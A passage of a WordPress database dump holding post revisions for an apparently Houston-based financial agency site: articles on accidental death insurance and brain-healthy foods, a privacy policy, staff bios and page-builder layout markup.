you and your loved ones prepared in the event of a fatal accident? In this article, we’ll explore some ways you can shore up your life insurance protection to help benefit your loved ones in the event of your untimely (and accidental) passing.\r\n<h3>What is accidental death insurance?</h3>\r\nAccidental death insurance is often a clause or rider connected to a life insurance policy. It provides additional benefits to beneficiaries in the event the insured passes away under the coverage period from a covered accident. The insured often pays an additional premium if this rider is added to their existing policy.\r\n<h3>What is considered an “accidental death”?</h3>\r\nAccidental deaths, in the eyes of many insurance companies, are those that occur as the result of an incident that’s caused by forces outside of your control.\r\n\r\nThink of car crashes, slips and falls, choking, drowning, machine accidents, and other situations that cannot be controlled and are deemed by the insurance company to be an accident.\r\n\r\nIncidences of an accidental death that stem from a hazardous activity, such as race car driving, base jumping, or sky diving, often aren’t covered under accidental death coverage. This is subject to the insurance company’s specific policy terms. Death from an illness is excluded. Deaths stemming from illegal activities can be excluded as well.\r\n<h3>Why might you want to consider accidental death coverage?</h3>\r\nAdding additional coverage to an existing life insurance policy can be a helpful benefit for your loved ones and beneficiaries. They can be even better protected in the event of your sudden, unforeseen passing.\r\n\r\nThe addition of accidental death coverage to your existing life insurance policy can provide extra help for your family in their time of need if they were to lose you to an accident.\r\n\r\n<span style=\"font-size: 10pt;\">Sources:\r\n</span><em><span style=\"font-size: 8pt;\">1. <a href=\"https://www.cdc.gov/nchs/fastats/accidental-injury.htm\" target=\"_blank\" rel=\"noopener noreferrer\">CDC, Accidents or Unintentional Injuries</a>, 2021</span></em>','Do I need Accidental Death Insurance?','','inherit','closed','closed','','61-revision-v1','','','2023-03-01 14:46:24','2023-03-01 14:46:24','',61,'http://cmdev-site1.com/?p=88',0,'revision','',0),(89,1,'2023-03-01 14:47:00','2023-03-01 14:47:00','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\n<div></div>\r\n<div class=\"article_info\">Eating healthy is not only good for your health and well-being, but it can also be extremely beneficial to your brain as well. According to experts, foods high in antioxidants and omega-3 fatty acids can improve brain health and memory.</div>\r\nThe following are six foods that can enhance brain function and protect it against diseases like dementia and Alzheimer’s...\r\n<ol>\r\n 	<li><strong>Walnuts – </strong>A 2009 study in the Journal of Nutrition revealed that a diet rich in nuts can actually reverse the signs of aging in the brain, including the ability to function and process information. In addition, a study performed in 2010 at the International Conference on Alzheimer’s disease showed that walnuts can improve learning, memory, and motor coordination. Walnuts are also known to be high in antioxidants, which some researchers believe may combat the damage done to the brain cells’ DNA.</li>\r\n 	<li><strong>Carrots – </strong>Not only have carrots been proven to be good for eyesight, but studies now show that they are great for the brain too. According to a 2007 article in the Archives of Internal Medicine, diets rich in beta-carotene over an extended period of time showed significant improvement in verbal memory and general cognition. In fact, scientists believe that beta-carotene can help eliminate the stress that contributes to brain aging.A study published in the 2010 Journal of Nutrition also revealed that carrots are high in luteolin. Luteolin is a compound that has been found to reduce age-related memory problems, as well as inflammation in the brain. Olive oil, peppers, and celery are also rich in luteolin.</li>\r\n 	<li><strong>Berries – </strong>Berries can provide a variety of health benefits, including memory improvement. The 2010 Journal of Agricultural and Food Chemistry noted that adults who suffered slight memory problems began to show memory and recall improvement after just twelve weeks of drinking wild blueberry juice. The study further showed that blueberries also helped with signs of depression in seniors.A 2009 study performed and recorded in the Journal of Nutrition showed that fruits high in antioxidants, such as blueberries and strawberries, can decrease stress in cells that are related to aging and increase certain brain functions.</li>\r\n 	<li><strong>Fish – </strong>According to recent studies, fish oil rich in omega-3 fatty acids may slow the cognitive decline that comes with age. A study in the journal Archives of Neurology found that people 65 and older who ate two meals a week for six years that included fish showed to have a 13 percent decrease in cognitive decline. Even those who only ate one meal with fish every week for six years demonstrated a ten percent decrease in cognitive decline. Fish is also a great resource for vitamin B12, which has been shown to help protect against Alzheimer’s disease.</li>\r\n 	<li><strong>Coffee/Tea – </strong>Coffee and tea have been shown to be beneficial in preventing Alzheimer’s disease and improving cognitive function. A study in the 2010 Journal of Alzheimer’s Disease noted that caffeinated coffee has been found to slow the progression of the disease or help prevent it from developing. Based on this finding, experts believe that coffee and tea may eventually be used as therapeutic treatment for people with Alzheimer’s disease.Research has also shown that tea can work as a protective agent for the brain. According to an article in the 2010 Journal of Nutrition, studies show that tea drinkers actually do better on memory tests and information processing than non-tea drinkers.</li>\r\n 	<li><strong>Spinach – </strong>Many health benefits come from spinach, including its ability to help to improve cognitive function. Scientists believe this is because it contains high amounts of vitamins C and E. According to a study published in the Journals of Gerontology in 2000, a diet rich in vitamin E increased brain and nerve tissue, as well as increased dopamine release into the brain, the chemical that allows information to be processed.Lastly, a study performed in 2000 and published in the journal Brain Research found that consuming spinach, strawberries, and blueberries can reverse age-related memory and motor deficits.</li>\r\n</ol>\r\nIn conclusion, these six brain foods may help improve brain health and perhaps even slow memory decline that can come with age.','6 Foods That Feed Your Brain','','inherit','closed','closed','','65-revision-v1','','','2023-03-01 14:47:00','2023-03-01 14:47:00','',65,'http://cmdev-site1.com/?p=89',0,'revision','',0),(90,1,'2023-03-01 14:50:05','2023-03-01 14:50:05','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\n<div></div>\n<div class=\"article_info\">Eating healthy is not only good for your health and well-being, but it can also be extremely beneficial to your brain as well. According to experts, foods high in antioxidants and omega-3 fatty acids can improve brain health and memory.</div>\nThe following are six foods that can enhance brain function and protect it against diseases like dementia and Alzheimer’s...\n<p style=\"padding-left: 40px;\"><strong>1. Walnuts – </strong>A 2009 study in the Journal of Nutrition revealed that a diet rich in nuts can actually reverse the signs of aging in the brain, including the ability to function and process information.</p>\n<p style=\"padding-left: 40px;\">In addition, a study performed in 2010 at the International Conference on Alzheimer’s disease showed that walnuts can improve learning, memory, and motor coordination. Walnuts are also known to be high in antioxidants, which some researchers believe may combat the damage done to the brain cells’ DNA.</p>\n<p style=\"padding-left: 40px;\"><strong>2. Carrots – </strong>Not only have carrots been proven to be good for eyesight, but studies now show that they are great for the brain too. According to a 2007 article in the Archives of Internal Medicine, diets rich in beta-carotene over an extended period of time showed significant improvement in verbal memory and general cognition.</p>\n<p style=\"padding-left: 40px;\">In fact, scientists believe that beta-carotene can help eliminate the stress that contributes to brain aging.</p>\n<p style=\"padding-left: 40px;\">A study published in the 2010 Journal of Nutrition also revealed that carrots are high in luteolin. Luteolin is a compound that has been found to reduce age-related memory problems, as well as inflammation in the brain. Olive oil, peppers, and celery are also rich in luteolin.</p>\n<p style=\"padding-left: 40px;\"><strong>3. Berries – </strong>Berries can provide a variety of health benefits, including memory improvement. The 2010 Journal of Agricultural and Food Chemistry noted that adults who suffered slight memory problems began to show memory and recall improvement after just twelve weeks of drinking wild blueberry juice. The study further showed that blueberries also helped with signs of depression in seniors.</p>\n<p style=\"padding-left: 40px;\">A 2009 study performed and recorded in the Journal of Nutrition showed that fruits high in antioxidants, such as blueberries and strawberries, can decrease stress in cells that are related to aging and increase certain brain functions.</p>\n<p style=\"padding-left: 40px;\"><strong>4. Fish – </strong>According to recent studies, fish oil rich in omega-3 fatty acids may slow the cognitive decline that comes with age. A study in the journal Archives of Neurology found that people 65 and older who ate two meals a week for six years that included fish showed to have a 13 percent decrease in cognitive decline.</p>\n<p style=\"padding-left: 40px;\">Even those who only ate one meal with fish every week for six years demonstrated a ten percent decrease in cognitive decline. Fish is also a great resource for vitamin B12, which has been shown to help protect against Alzheimer’s disease.</p>\n<p style=\"padding-left: 40px;\"><strong>5. Coffee/Tea – </strong>Coffee and tea have been shown to be beneficial in preventing Alzheimer’s disease and improving cognitive function. A study in the 2010 Journal of Alzheimer’s Disease noted that caffeinated coffee has been found to slow the progression of the disease or help prevent it from developing.</p>\n<p style=\"padding-left: 40px;\">Based on this finding, experts believe that coffee and tea may eventually be used as therapeutic treatment for people with Alzheimer’s disease.Research has also shown that tea can work as a protective agent for the brain.</p>\n<p style=\"padding-left: 40px;\">According to an article in the 2010 Journal of Nutrition, studies show that tea drinkers actually do better on memory tests and information processing than non-tea drinkers.</p>\n<p style=\"padding-left: 40px;\"><strong>6. Spinach – </strong>Many health benefits come from spinach, including its ability to help to improve cognitive function. Scientists believe this is because it contains high amounts of vitamins C and E.</p>\n<p style=\"padding-left: 40px;\">According to a study published in the Journals of Gerontology in 2000, a diet rich in vitamin E increased brain and nerve tissue, as well as increased dopamine release into the brain, the chemical that allows information to be processed.</p>\n<p style=\"padding-left: 40px;\">Lastly, a study performed in 2000 and published in the journal Brain Research found that consuming spinach, strawberries, and blueberries can reverse age-related memory and motor deficits.</p>\nIn conclusion, these six brain foods may help improve brain health and perhaps even slow memory decline that can come with age.','6 Foods That Feed Your Brain','','inherit','closed','closed','','65-autosave-v1','','','2023-03-01 14:50:05','2023-03-01 14:50:05','',65,'http://cmdev-site1.com/?p=90',0,'revision','',0),(91,1,'2023-03-01 14:50:26','2023-03-01 14:50:26','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Stacy Williams</span></div>\r\n<div></div>\r\n<div class=\"article_info\">Eating healthy is not only good for your health and well-being, but it can also be extremely beneficial to your brain as well. According to experts, foods high in antioxidants and omega-3 fatty acids can improve brain health and memory.</div>\r\nThe following are six foods that can enhance brain function and protect it against diseases like dementia and Alzheimer’s...\r\n<p style=\"padding-left: 40px;\"><strong>1. Walnuts – </strong>A 2009 study in the Journal of Nutrition revealed that a diet rich in nuts can actually reverse the signs of aging in the brain, including the ability to function and process information.</p>\r\n<p style=\"padding-left: 40px;\">In addition, a study performed in 2010 at the International Conference on Alzheimer’s disease showed that walnuts can improve learning, memory, and motor coordination.</p>\r\n<p style=\"padding-left: 40px;\">Walnuts are also known to be high in antioxidants, which some researchers believe may combat the damage done to the brain cells’ DNA.</p>\r\n<p style=\"padding-left: 40px;\"><strong>2. Carrots – </strong>Not only have carrots been proven to be good for eyesight, but studies now show that they are great for the brain too. According to a 2007 article in the Archives of Internal Medicine, diets rich in beta-carotene over an extended period of time showed significant improvement in verbal memory and general cognition.</p>\r\n<p style=\"padding-left: 40px;\">In fact, scientists believe that beta-carotene can help eliminate the stress that contributes to brain aging.</p>\r\n<p style=\"padding-left: 40px;\">A study published in the 2010 Journal of Nutrition also revealed that carrots are high in luteolin. Luteolin is a compound that has been found to reduce age-related memory problems, as well as inflammation in the brain. Olive oil, peppers, and celery are also rich in luteolin.</p>\r\n<p style=\"padding-left: 40px;\"><strong>3. Berries – </strong>Berries can provide a variety of health benefits, including memory improvement. The 2010 Journal of Agricultural and Food Chemistry noted that adults who suffered slight memory problems began to show memory and recall improvement after just twelve weeks of drinking wild blueberry juice. The study further showed that blueberries also helped with signs of depression in seniors.</p>\r\n<p style=\"padding-left: 40px;\">A 2009 study performed and recorded in the Journal of Nutrition showed that fruits high in antioxidants, such as blueberries and strawberries, can decrease stress in cells that are related to aging and increase certain brain functions.</p>\r\n<p style=\"padding-left: 40px;\"><strong>4. Fish – </strong>According to recent studies, fish oil rich in omega-3 fatty acids may slow the cognitive decline that comes with age. A study in the journal Archives of Neurology found that people 65 and older who ate two meals a week for six years that included fish showed to have a 13 percent decrease in cognitive decline.</p>\r\n<p style=\"padding-left: 40px;\">Even those who only ate one meal with fish every week for six years demonstrated a ten percent decrease in cognitive decline. Fish is also a great resource for vitamin B12, which has been shown to help protect against Alzheimer’s disease.</p>\r\n<p style=\"padding-left: 40px;\"><strong>5. Coffee/Tea – </strong>Coffee and tea have been shown to be beneficial in preventing Alzheimer’s disease and improving cognitive function. A study in the 2010 Journal of Alzheimer’s Disease noted that caffeinated coffee has been found to slow the progression of the disease or help prevent it from developing.</p>\r\n<p style=\"padding-left: 40px;\">Based on this finding, experts believe that coffee and tea may eventually be used as therapeutic treatment for people with Alzheimer’s disease.Research has also shown that tea can work as a protective agent for the brain.</p>\r\n<p style=\"padding-left: 40px;\">According to an article in the 2010 Journal of Nutrition, studies show that tea drinkers actually do better on memory tests and information processing than non-tea drinkers.</p>\r\n<p style=\"padding-left: 40px;\"><strong>6. Spinach – </strong>Many health benefits come from spinach, including its ability to help to improve cognitive function. Scientists believe this is because it contains high amounts of vitamins C and E.</p>\r\n<p style=\"padding-left: 40px;\">According to a study published in the Journals of Gerontology in 2000, a diet rich in vitamin E increased brain and nerve tissue, as well as increased dopamine release into the brain, the chemical that allows information to be processed.</p>\r\n<p style=\"padding-left: 40px;\">Lastly, a study performed in 2000 and published in the journal Brain Research found that consuming spinach, strawberries, and blueberries can reverse age-related memory and motor deficits.</p>\r\nIn conclusion, these six brain foods may help improve brain health and perhaps even slow memory decline that can come with age.','6 Foods That Feed Your Brain','','inherit','closed','closed','','65-revision-v1','','','2023-03-01 14:50:26','2023-03-01 14:50:26','',65,'http://cmdev-site1.com/?p=91',0,'revision','',0),(558,3,'2023-04-01 13:56:36','2023-04-01 13:56:36','<!-- wp:heading -->\n<h2>Who we are</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Our website address is: <a href=\"https://www.jsuttonfinancial.com/\" target=\"_blank\" rel=\"noopener\">https://www.jsuttonfinancial.com/</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Comments</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>When visitors leave comments on the site, we collect the data shown in the comments form and the visitor’s IP address and browser user agent string to help spam detection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Media</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Cookies</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you leave a comment on our site, you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select \"Remember Me,\" your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Embedded content from other websites</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Articles on this site may include embedded content (e.g., videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Who we share your data with</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you request a password reset, your IP address will be included in the reset email.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>How long we retain your data</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What rights you have over your data</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Where your data is sent</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Visitor comments may be checked through an automated spam detection service.</p>\n<!-- /wp:paragraph -->','Privacy Policy','','inherit','closed','closed','','3-autosave-v1','','','2023-04-01 13:56:36','2023-04-01 13:56:36','',3,'http://cmdev-site1.com/?p=558',0,'revision','',0),(593,1,'2023-04-02 18:32:03','2023-04-02 18:32:03','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" min_height=\"200.8px\" custom_margin=\"-14px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" custom_padding=\"||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][dsm_text_divider _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" header=\"Our Story\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" sticky_enabled=\"0\" header_level=\"h2\" header_text_align=\"center\" divider_style=\"dotted\" divider_weight=\"3px\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Justin Confrence Room 2 Black & White Muted\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"-11px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" custom_padding=\"66px||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-02 18:32:03','2023-04-02 18:32:03','',26,'http://cmdev-site1.com/?p=593',0,'revision','',0),(130,1,'2023-03-03 15:13:17','2023-03-03 15:13:17','[et_pb_section admin_label=\"section\"]\n			[et_pb_row admin_label=\"row\"]\n				[et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"]<div id=\"comp-l7tp3rv01\" class=\"KcpHeO tz5f0K comp-l7tp3rv01 wixui-text\" data-testid=\"richTextElement\">\n<h2 class=\"font_5\" style=\"text-align: center;\">Get to Know Us</h2>\n</div>\n<div id=\"comp-l7tp3rv4\" class=\"KcpHeO tz5f0K comp-l7tp3rv4 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_7\" style=\"text-align: center;\">J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p class=\"font_7\" style=\"text-align: center;\">We service clients and work as a team</p>\n<p class=\"font_7\" style=\"text-align: center;\">at our home office in Houston as well as 100% remote. This allows us to have an incredible office culture and service more clients with an agent reach from coast-to-coast.</p>\n\n<h2 class=\"font_5\" style=\"text-align: center;\">Partners</h2>\n<div id=\"comp-l6v9yz79\" class=\"BaOVQ8 tz5f0K comp-l6v9yz79 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_8\" style=\"text-align: center;\"><em><strong><span class=\"color_15\">Trusted and Endorsed</span></strong></em></p>\n\n</div>\n<div id=\"comp-l6v9yz791\" class=\"KcpHeO tz5f0K comp-l6v9yz791 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_9\" style=\"text-align: center;\"><span class=\"color_15\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>\n\n</div>\n</div>\n<div id=\"comp-l7tp3rv4\" class=\"KcpHeO tz5f0K comp-l7tp3rv4 wixui-text\" data-testid=\"richTextElement\">\n\n<img class=\"aligncenter size-medium wp-image-29\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/justinsuttonheadshotsmall-Black-White-300x284.png\" alt=\"\" width=\"300\" height=\"284\" />\n<div id=\"comp-l6v9yz7a\" class=\"KcpHeO tz5f0K comp-l6v9yz7a wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Justin Sutton</strong>\n</span>Owner/Founder</p>\n\n</div>\n<div id=\"comp-l6v9yz7a1\" class=\"KcpHeO tz5f0K comp-l6v9yz7a1 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Fin</span><span class=\"color_15\">ancial Services Industry.</span></p>\n\n\n</div>\n<img class=\"aligncenter size-medium wp-image-30\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/sethheadshot-Black-White-273x300.png\" alt=\"\" width=\"273\" height=\"300\" />\n\n</div>\n<div id=\"comp-l6v9yz7b2\" class=\"KcpHeO tz5f0K comp-l6v9yz7b2 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Seth Ordeneaux</strong>\n</span>Managing Director</p>\n\n</div>\n<div id=\"comp-l6v9yz7c\" class=\"KcpHeO tz5f0K comp-l6v9yz7c wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Since Starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>\n\n\n</div>\n<img class=\"aligncenter size-medium wp-image-31\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/F588F955-17B7-46C3-AE39-F6F2077500AE_edited_edited-Black-White-300x292.png\" alt=\"\" width=\"300\" height=\"292\" />\n<div id=\"comp-l6v9yz7d\" class=\"KcpHeO tz5f0K comp-l6v9yz7d wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\" style=\"text-align: center;\"><span class=\"color_15\"><strong>Matthew Sutton</strong>\n</span>Managing Director</p>\n\n</div>\n<div id=\"comp-l6v9yz7d1\" class=\"KcpHeO tz5f0K comp-l6v9yz7d1 wixui-text\" data-testid=\"richTextElement\">\n<p class=\"font_8\" style=\"text-align: center;\"><span class=\"color_15\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>\n\n\n<img class=\"aligncenter size-medium wp-image-32\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/322630_f5d4b3c18c504cd7a2cadd94a2a0cf51_mv2-Black-White-300x293.png\" alt=\"\" width=\"300\" height=\"293\" />\n<p style=\"text-align: center;\"><strong>Andres Cano</strong>\nManaging Director</p>\n<p style=\"text-align: center;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso, Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</p>\n\n\n<hr />\n\n\n\n<hr />\n\n</div>[/et_pb_text][/et_pb_column]\n			[/et_pb_row]\n		[/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-03-03 15:13:17','2023-03-03 15:13:17','',26,'http://cmdev-site1.com/?p=130',0,'revision','',0),(138,1,'2023-03-19 03:31:43','2023-03-19 03:31:43','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" menu_icon_color=\"#FFFFFF\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work With Us\" button_alignment=\"center\" _builder_version=\"4.20.4\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" align=\"center\" always_center_on_mobile=\"off\" _builder_version=\"4.20.4\" _module_preset=\"default\" width=\"70%\" width_tablet=\"70%\" 